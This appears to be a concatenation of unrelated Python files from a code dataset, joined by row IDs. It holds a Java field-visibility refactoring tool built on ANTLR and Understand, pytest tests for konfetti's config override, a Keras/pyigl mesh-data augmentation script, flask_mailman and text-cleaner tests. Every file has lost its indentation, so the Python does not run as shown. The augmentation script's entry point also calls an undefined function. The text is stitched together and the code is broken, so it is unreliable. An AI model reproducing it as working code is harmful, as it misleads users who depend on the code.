if ctx.expression().primary() is not None:
if ctx.expression().primary().IDENTIFIER().getText() in self.object_name:
parent_ctx = ctx.parentCtx
count = parent_ctx.getChildCount()
if count == 3:
expression_text = parent_ctx.children[2].getText()
self.token_stream_rewriter.replaceRange(
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'set' + str.capitalize(
ctx.IDENTIFIER().getText()) + '(' + ctx.expression().primary().IDENTIFIER().getText() + '.get' + str.capitalize(
ctx.IDENTIFIER().getText()) + '() ' + self.getoperator(
str(parent_ctx.children[1])) + "( " + expression_text + ') )'
)
return True
# }}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}
if ctx.expression() is not None:
if ctx.expression().primary() is not None:
if ctx.expression().primary().IDENTIFIER().getText() in self.object_name:
# print("ctx.expression().primary().IDENTIFIER().getText()=",ctx.expression().primary().IDENTIFIER().getText())
parent_ctx = ctx.parentCtx
count = parent_ctx.getChildCount()
if count == 3:
expression_text = parent_ctx.children[2].getText()
self.token_stream_rewriter.replaceRange(
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'set' + str.capitalize(
ctx.IDENTIFIER().getText()) + '(' + expression_text + ')'
)
else: # expression is after =
if self.action_to_do == "Set":
return None
if self.check_is_expression_obj_and_field(ctx):
if ctx.expression() is not None:
if ctx.expression().primary() is not None:
if (
ctx.expression().primary().IDENTIFIER().getText() in self.object_name and ctx.IDENTIFIER().getText() == self.using_field_name):
self.token_stream_rewriter.replaceRange(
from_idx=ctx.start.tokenIndex,
to_idx=ctx.stop.tokenIndex,
text=ctx.expression().primary().IDENTIFIER().getText() + '.' + 'get' + str.capitalize(
ctx.IDENTIFIER().getText()) + '()'
)
# if ctx.expression() != None:
# print("ctx.getText()===============",ctx.getText())
# self.check_is_exprresion_obj_and_field(ctx)
# TODO: Check or remove this comments
# def enterVariableDeclarator(self, ctx: JavaParserLabeled.VariableDeclaratorContext):
# if self.action_to_do == "Set":
# return None
#
# if not self.is_class:
# return None
#
# grand_child_ctx = ctx.variableInitializer().expression()
# if (str(type(
# grand_child_ctx)) == "<class 'gen.javaLabeled.JavaParserLabeled.JavaParserLabeled.Expression1Context'>"):
# usingfieldidentifier = grand_child_ctx.IDENTIFIER().getText()
#
# if usingfieldidentifier == self.using_field_name:
# objectidentifier = grand_child_ctx.expression().primary().IDENTIFIER().getText()
#
# if objectidentifier in self.object_name:
# self.token_stream_rewriter.replaceRange(
# from_idx=grand_child_ctx.start.tokenIndex,
# to_idx=grand_child_ctx.stop.tokenIndex,
# text=grand_child_ctx.expression().primary().IDENTIFIER().getText() + '.' + 'get' + str.capitalize(
# grand_child_ctx.IDENTIFIER().getText()) + '()'
# )
class PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(JavaParserLabeledListener):
def __init__(self, common_token_stream: CommonTokenStream = None, source_class=None,
propagated_class_name=None):
"""Used for propagation purposes in the other classes of the project:
Detect the objects which have to be propagated
Args:
common_token_stream (CommonTokenStream): A stream of tokens generated by parsing the main file using the ANTLR parser generator
source_class (str): Name of the class in which the propagation has to be implemented
propagated_class_name (str): Name of the class which has to be propagated
Returns: No returns
"""
if source_class is None:
self.source_class = []
else:
self.source_class = source_class
if propagated_class_name is None:
self.propagated_class_name = []
else:
self.propagated_class_name = propagated_class_name
if common_token_stream is None:
raise ValueError('common_token_stream is None')
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
self.is_class = False
self.current_class = ''
self.objects = list()
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
class_identifier = ctx.IDENTIFIER().getText()
if class_identifier in self.propagated_class_name:
self.is_class = True
print("Propagation get object started, please wait...")
self.current_class = class_identifier
else:
self.is_class = False
def enterVariableDeclarator(self, ctx: JavaParserLabeled.VariableDeclaratorContext):
if not self.is_class:
return None
grand_parent_ctx = ctx.parentCtx.parentCtx
if grand_parent_ctx.typeType().classOrInterfaceType() is not None:
class_name = grand_parent_ctx.typeType().classOrInterfaceType().IDENTIFIER(0).getText()
if class_name in self.source_class:
object_name = ctx.variableDeclaratorId().IDENTIFIER().getText()
self.objects.append(object_name)
def main():
print("Increase Field Visibility")
# Note: If a class is not in a package -> package_name=(Unnamed_Package)
udb_path = "/data/Dev/JavaSample/JavaSample.udb"
package_name = "my_package"
class_name = "Source"
field_name = "number3"
file_list_to_be_propagate = set()
propagate_classes = set()
file_list_to_be_propagate_for_setby = set()
propagate_classes_for_setby = set()
file_list_to_be_propagate_for_getby = set()
propagate_classes_for_getby = set()
file_list_include_file_name_that_edited = ""
main_file = ""
db = und.open(udb_path)
# TODO: Check filter
for field in db.ents("public variable"):
if (str(field) == str(class_name + "." + field_name) and str(
field.parent().ref("Java Containin").ent()) == package_name):
print(field)
if field.parent().parent().relname() is not None:
main_file = field.parent().parent().longname(True)
print("mainfile=", main_file)
else:
for ref in field.refs("Definein"):
main_file = (ref.file().longname())
for ref in field.refs("Setby , Modifyby"):
if not (str(ref.ent()) == str(field.parent())
or str(ref.ent().parent()) == str(field.parent())):
propagate_classes_for_setby.add(str(ref.ent().parent().simplename()))
file_list_to_be_propagate_for_setby.add(ref.file().longname(True))
for ref in field.refs("Useby"):
if not str(ref.ent()) == str(field.parent() or str(ref.ent().parent()) == str(field.parent())):
propagate_classes_for_getby.add(str(ref.ent().parent().simplename()))
file_list_to_be_propagate_for_getby.add(ref.file().longname(True))
file_list_to_be_propagate = list(file_list_to_be_propagate)
propagate_classes = list(propagate_classes)
if main_file == "":
print("main file not found!!!")
return False
stream = FileStream(main_file, encoding='utf8')
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener = IncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
source_class=class_name,
field_name=field_name)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
print("my_listener is walked")
# print(my_listener.token_stream_rewriter.getDefaultText())
with open(main_file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
print("file_list_to_be_propagate:", file_list_to_be_propagate)
for file in file_list_to_be_propagate_for_getby:
print("file_list_to_be_propagate_for_Getby:", file)
stream = FileStream(file, encoding='utf8')
# input_stream = StdinStream()
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener_get_object = PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(token_stream,
source_class=class_name,
propagated_class_name=propagate_classes_for_getby)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener_get_object)
print("my_listener_get_object.objects:", my_listener_get_object.objects)
my_listener = PropagationIncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
using_field_name=field_name,
object_name=my_listener_get_object.objects,
propagated_class_name=propagate_classes_for_getby,
action_to_do="Get")
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
# print(my_listener.token_stream_rewriter.getDefaultText())
with open(file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
for file in file_list_to_be_propagate_for_setby:
print("file_list_to_be_propagate_for_setby:", file)
stream = FileStream(file, encoding='utf8')
# Step 2: Create an instance of AssignmentStLexer
lexer = JavaLexer(stream)
# Step 3: Convert the input source into a list of tokens
token_stream = CommonTokenStream(lexer)
# Step 4: Create an instance of the AssignmentStParser
parser = JavaParserLabeled(token_stream)
parser.getTokenStream()
parse_tree = parser.compilationUnit()
my_listener_get_object = PropagationIncreaseFieldVisibilityGetObjectsRefactoringListener(token_stream,
source_class=class_name,
propagated_class_name=propagate_classes_for_setby)
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener_get_object)
print("my_listener_get_object.objects:", my_listener_get_object.objects)
my_listener = PropagationIncreaseFieldVisibilityRefactoringListener(common_token_stream=token_stream,
using_field_name=field_name,
object_name=my_listener_get_object.objects,
propagated_class_name=propagate_classes_for_setby,
action_to_do="Set")
walker = ParseTreeWalker()
walker.walk(t=parse_tree, listener=my_listener)
with open(file, mode='w', encoding="utf-8", newline='') as f:
f.write(my_listener.token_stream_rewriter.getDefaultText())
if __name__ == '__main__':
main()
|
1710118
|
import sys
import pytest
from konfetti import Konfig
from konfetti.exceptions import ForbiddenOverrideError
pytestmark = [pytest.mark.usefixtures("settings")]
skip_if_py2 = pytest.mark.skipif(sys.version_info[0] == 2, reason="Async syntax is not supported on Python 2.")
def test_override_function(testdir):
"""`override` decorator allows users to set custom config values per test function."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
@config.override(INTEGER=123)
def test_override_function():
assert config.INTEGER == 123
@config.override(INTEGER=123)
def test_override_function_with_fixture(example):
assert config.INTEGER == 123
assert example == "test"
@config.override(INTEGER=123)
@pytest.mark.parametrize("x", [1, 2])
def test_override_function_with_parametrize(example, x):
assert config.INTEGER == 123
assert example == "test"
assert isinstance(x, int)
@pytest.mark.parametrize("x", [1, 2])
@config.override(INTEGER=123)
def test_override_function_with_parametrize_first(example, x):
assert config.INTEGER == 123
assert example == "test"
assert isinstance(x, int)
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=7)
def test_override_vault_secret(testdir):
"""Vault vault should be overridden correctly."""
testdir.makepyfile(
"""
from settings import config
@config.override(SECRET="not secret")
def test_override_function():
assert config.SECRET == "not secret"
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_override_method(testdir):
"""`override` decorator also works for class methods."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
class TestOverride:
@config.override(INTEGER=123)
def test_override(self):
assert config.INTEGER == 123
@config.override(INTEGER=123)
def test_override_with_fixture(self, example):
assert config.INTEGER == 123
assert example == "test"
def test_disable_on_method(self):
assert config.INTEGER == 1
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=4)
def test_override_class(testdir):
"""`override` decorator also works for classes."""
testdir.makepyfile(
"""
from settings import config
import pytest
@pytest.fixture
def example():
return "test"
@config.override(INTEGER=123)
class TestOverride:
def test_override(self):
assert config.INTEGER == 123
def test_override_with_fixture(self, example):
assert config.INTEGER == 123
assert example == "test"
@config.override(INTEGER=456)
def test_another_override(self, example):
assert config.INTEGER == 456
assert example == "test"
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=4)
def test_override_class_with_setup(testdir):
"""`override` decorator also works for classes that have custom `setup_class` and `teardown_class` methods."""
testdir.makepyfile(
"""
from settings import config
@config.override(INTEGER=123)
class TestOverride:
@classmethod
def setup_class(cls):
cls.attr = 42
def test_override(self):
assert self.attr == 42
assert config.INTEGER == 123
def test_another_override(self):
assert self.attr == 42
assert config.INTEGER == 123
@classmethod
def teardown_class(cls):
print("TearDown call")
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=3)
result.stdout.fnmatch_lines(["*TearDown call*"])
def test_override_unittest_class(testdir):
"""`override` decorator also works for unittest-style classes."""
testdir.makepyfile(
"""
import unittest
from settings import config
@config.override(INTEGER=123)
class TestOverride(unittest.TestCase):
def test_override(self):
assert config.INTEGER == 123
def test_another_override(self):
assert config.INTEGER == 123
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=3)
def test_override_unittest_class_custom_setup(testdir):
"""If unittest-style class has custom `setUp` and `tearDown` then `override` should work as well."""
testdir.makepyfile(
"""
import unittest
from settings import config
@config.override(INTEGER=123)
class TestOverride(unittest.TestCase):
def setUp(self):
self.func = 1
@classmethod
def setUpClass(cls):
cls.cls = 2
def test_override(self):
assert self.func == 1
assert self.cls == 2
assert config.INTEGER == 123
def test_another_override(self):
assert self.func == 1
assert self.cls == 2
assert config.INTEGER == 123
def tearDown(self):
print("TearDown call")
@classmethod
def tearDownClass(cls):
print("TearDownClass call")
def test_disable_on_function():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=3)
result.stdout.fnmatch_lines(["*TearDownClass call*"])
result.stdout.fnmatch_lines(["*TearDown call*"])
def test_override_custom_setup_error(testdir):
"""When an error occurs in a custom setup method config should be unconfigured."""
testdir.makepyfile(
"""
from settings import config
@config.override(INTEGER=123)
class TestOverride:
@classmethod
def setup_class(cls):
1 / 0
def test_override(self):
print("NOT EXECUTED")
@classmethod
def teardown_class(cls):
1 / 0
def test_disabled():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest("-s")
result.assert_outcomes(passed=1, error=1)
assert "NOT EXECUTED" not in result.stdout._log_text
@skip_if_py2
def test_async_test(testdir):
"""`override` decorator works for async tests."""
testdir.makepyfile(
"""
import pytest
from settings import config
pytestmark = pytest.mark.asyncio
@config.override(INTEGER=123)
async def test_override_per_test():
assert config.INTEGER == 123
async def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=2)
def test_override_unknown_type(config):
"""`override` can't decorate arbitrary types."""
with pytest.raises(TypeError, match="Don't know how to use `override` for `int`"):
config.override(INTEGER=123)(123)
def test_override_unknown_option():
"""If an option passed to `override` doesn't exist in the config module an error should be risen.
Active only with `strict_override` config option.
"""
config = Konfig(strict_override=True)
with pytest.raises(
ForbiddenOverrideError,
match="Can't override `NOT_EXIST` config option, because it is not defined in the config module",
):
with config.override(NOT_EXIST=123):
pass
def test_strict_override_valid():
config = Konfig(strict_override=True)
with config.override(INTEGER=123):
assert config.INTEGER == 123
def test_override_context_manager(config):
"""It is possible to use it as a context manager."""
with config.override(INTEGER=123):
assert config.INTEGER == 123
assert config.INTEGER == 1
def test_override_context_manager_nested(testdir):
"""Multiple levels of overriding are nested."""
testdir.makepyfile(
"""
from settings import config
def test_context_manager():
with config.override(INTEGER=123):
with config.override(KEY="overridden"):
assert config.INTEGER == 123
assert config.KEY == "overridden"
assert config.KEY == "value"
assert config.INTEGER == 123
assert config.INTEGER == 1
assert config.KEY == "value"
@config.override(KEY="foo")
def test_context_manager_with_decorator():
assert config.KEY == "foo"
with config.override(INTEGER=123):
with config.override(KEY="overridden"):
assert config.INTEGER == 123
assert config.KEY == "overridden"
assert config.KEY == "foo"
assert config.INTEGER == 123
assert config.INTEGER == 1
assert config.KEY == "foo"
def test_disable():
assert config.INTEGER == 1
"""
)
result = testdir.runpytest()
result.assert_outcomes(passed=3)
def test_no_setup_on_override(mocked_import_config_module):
"""If overridden option is accessed, then config is not loaded."""
config = Konfig(strict_override=False)
with config.override(EXAMPLE="awesome"):
assert config.EXAMPLE == "awesome"
mocked_import_config_module.assert_not_called()
def test_setup_on_override(mocked_import_config_module):
"""If non-overridden option is accessed, then config should be loaded."""
config = Konfig()
with config.override(SOMETHING="awesome"):
assert config.EXAMPLE == "test"
# Py2.7, Py3.5: replace with `assert_called` when 2.7/3.5 support will be dropped.
assert mocked_import_config_module.called is True
assert mocked_import_config_module.call_count >= 1
|
1710121
|
from utils import run_with_curio
@run_with_curio
async def test_verify(httpbin_secure):
pass
@run_with_curio
async def test_cert(httpbin_secure):
pass
|
1710125
|
import sys
import os
import subprocess
import numpy
import pyigl as igl
from utils.iglhelpers import e2p, p2e
from utils import my_utils
current_frame = 0
def sample_more_encoded_displacements(encoded_displacements, num_extra_per_pose=10):
max_diff = numpy.zeros(encoded_displacements.shape[1])
for i in range(len(encoded_displacements) - 1):
abs_diff = numpy.abs(encoded_displacements[i] - encoded_displacements[i+1])
max_diff = numpy.max(numpy.stack((abs_diff, max_diff)), 0)
mu = 0
sigma = max(max_diff / 6.0) # Just take max scaled by a factor for now
extra_encoded_displacements = numpy.repeat(encoded_displacements, num_extra_per_pose, axis=0)
extra_encoded_displacements += numpy.random.normal(mu, sigma, extra_encoded_displacements.shape)
# print(extra_encoded_displacements[:len(encoded_displacements)] - encoded_displacements)
return extra_encoded_displacements
def save_mat_with_prefix(path, prefix, mat):
dmat_path = os.path.join(path, '%s.dmat' % (prefix))
my_utils.save_numpy_mat_to_dmat(dmat_path, mat)
return dmat_path
def reencode_and_augment_training_data(model_root, num_extra_per_poses=0):
"""
Loads existing traing data and generates new encoding / energy vector pairs for
1. Energy evalutated on decoded displacements of training data.
2. Energy evaluated on poses sampled around the encoded training poses.
"""
training_data_path = os.path.join(model_root,'training_data/training')
U = igl.eigen.MatrixXd()
igl.readDMAT(os.path.join(model_root, 'pca_results/ae_pca_components.dmat'), U)
displacements = my_utils.load_displacement_dmats_to_numpy(training_data_path)
flatten_displ, unflatten_displ = my_utils.get_flattners(displacements)
from keras.models import Model, load_model
encoder = load_model(os.path.join(model_root,'keras_models/encoder.hdf5'))
decoder = load_model(os.path.join(model_root,'keras_models/decoder.hdf5'))
encoded_displacements = encoder.predict(flatten_displ(displacements) @ U)
decoded_displacements = decoder.predict(encoded_displacements) @ U.transpose()
print('Generating extra samples...')
extra_encoded_displacements = sample_more_encoded_displacements(encoded_displacements, num_extra_per_poses)
extra_decoded_displacements = decoder.predict(extra_encoded_displacements) @ U.transpose()
sampled_training_data_path = os.path.join(model_root, 'augmented_training_data/sampled/')
reencoded_training_data_path = os.path.join(model_root, 'augmented_training_data/reencoded/')
my_utils.create_dir_if_not_exist(sampled_training_data_path)
my_utils.create_dir_if_not_exist(reencoded_training_data_path)
extra_displacements_path = save_mat_with_prefix(sampled_training_data_path, 'displacements', extra_decoded_displacements)
save_mat_with_prefix(sampled_training_data_path, 'enc_displacements', extra_encoded_displacements)
reencoded_displacements_path = save_mat_with_prefix(reencoded_training_data_path, 'displacements', decoded_displacements)
save_mat_with_prefix(reencoded_training_data_path, 'enc_displacements', encoded_displacements)
tet_mesh_path = os.path.join(model_root, 'tets.mesh')
parameters_path = os.path.join(model_root, 'training_data/training/parameters.json')
print('Computing energies for reencoded poses...')
subprocess.call(['./generate_data_for_pose/build/bin/GenerateDataForPose', reencoded_displacements_path, tet_mesh_path, parameters_path])
print('Computing energies for samples...')
subprocess.call(['./generate_data_for_pose/build/bin/GenerateDataForPose', extra_displacements_path, tet_mesh_path, parameters_path])
## TODO
# Save them all as one matrix.. It's more efficient that way
# Now I just have to get the energies and I can plop this into my pipeline
# scale = numpy.max(energies)
# print(numpy.apply_along_axis(numpy.linalg.norm, 1, energies).shape)
# print("scale: ", scale)
# # energies = energies.reshape((len(energies), len(energies[0]))) / scale
# # energies_test = energies_test.reshape((len(energies_test), len(energies_test[0]))) / scale
# energies = energies / numpy.apply_along_axis(numpy.linalg.norm, 1, energies)[:, None]
# # energies_test = energies_test / scale
# # print(energies)
# # energies = numpy.sum(energies,axis=1)
# # print(energies)
# # energies_test = numpy.sum(energies_test,axis=1)
# flatten_data, unflatten_data = my_utils.get_flattners(energies)
# Set up drawings
# np_verts, np_faces = my_utils.load_base_vert_and_face_dmat_to_numpy(training_data_path)
# viewer = igl.viewer.Viewer()
# viewer.data.set_mesh(p2e(np_verts), p2e(np_faces))
# def pre_draw(viewer):
# global current_frame
# if viewer.core.is_animating:
# idx = current_frame % len(extra_decoded_displacements)
# verts = extra_decoded_displacements[current_frame].reshape(np_verts.shape) + np_verts
# viewer.data.set_vertices(p2e(verts))
# viewer.data.compute_normals()
# current_frame += 1
# return False
# viewer.callback_pre_draw = pre_draw
# # viewer.callback_key_down = key_down
# viewer.core.is_animating = False
# # viewer.core.camera_zoom = 2.5
# viewer.core.animation_max_fps = 3
# viewer.launch()
if __name__ == '__main__':
model_root = sys.argv[1]
augment_training_data(model_root)
|
1710140
|
import unittest
from contextlib import contextmanager
import pytest
from flask import Flask
from flask_mailman import Mail
class TestCase(unittest.TestCase):
TESTING = True
MAIL_DEFAULT_SENDER = "<EMAIL>"
def setUp(self):
self.app = Flask(__name__)
self.app.config.from_object(self)
self.assertTrue(self.app.testing)
self.mail = Mail(self.app)
self.ctx = self.app.test_request_context()
self.ctx.push()
def tearDown(self):
self.ctx.pop()
@contextmanager
def mail_config(self, **settings):
"""
Context manager to alter mail config during a test and restore it after,
even in case of a failure.
"""
original = {}
state = self.mail.state
for key in settings:
assert hasattr(state, key)
original[key] = getattr(state, key)
setattr(state, key, settings[key])
yield
# restore
for k, v in original.items():
setattr(state, k, v)
def assertIn(self, member, container, msg=None):
if hasattr(unittest.TestCase, 'assertIn'):
return unittest.TestCase.assertIn(self, member, container, msg)
return self.assertTrue(member in container)
def assertNotIn(self, member, container, msg=None):
if hasattr(unittest.TestCase, 'assertNotIn'):
return unittest.TestCase.assertNotIn(self, member, container, msg)
return self.assertFalse(member in container)
def assertIsNone(self, obj, msg=None):
if hasattr(unittest.TestCase, 'assertIsNone'):
return unittest.TestCase.assertIsNone(self, obj, msg)
return self.assertTrue(obj is None)
def assertIsNotNone(self, obj, msg=None):
if hasattr(unittest.TestCase, 'assertIsNotNone'):
return unittest.TestCase.assertIsNotNone(self, obj, msg)
return self.assertTrue(obj is not None)
@pytest.fixture(autouse=True)
def capsys(self, capsys):
self.capsys = capsys
|
1710148
|
import unittest
from broca.preprocess import BasicCleaner, HTMLCleaner
class PreProcessTests(unittest.TestCase):
def test_clean(self):
doc = '''
Goats are like mushrooms. If you shoot a duck, I'm scared of toasters. My site's are https://google.com.
'''
expected_doc = '''
goats are like mushrooms if you shoot a duck im scared of toasters my site are
'''
doc = BasicCleaner().preprocess([doc])[0]
self.assertEqual(doc, expected_doc.strip())
def test_html_clean(self):
doc = '''
<html>goats are like <b>mushrooms</b> if you shoot a duck <em>im scared of toasters</em> my site are<div></div></html>
'''
expected_doc = '''
goats are like mushrooms if you shoot a duck im scared of toasters my site are
'''
doc = HTMLCleaner().preprocess([doc])[0]
self.assertEqual(doc, expected_doc.strip())
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.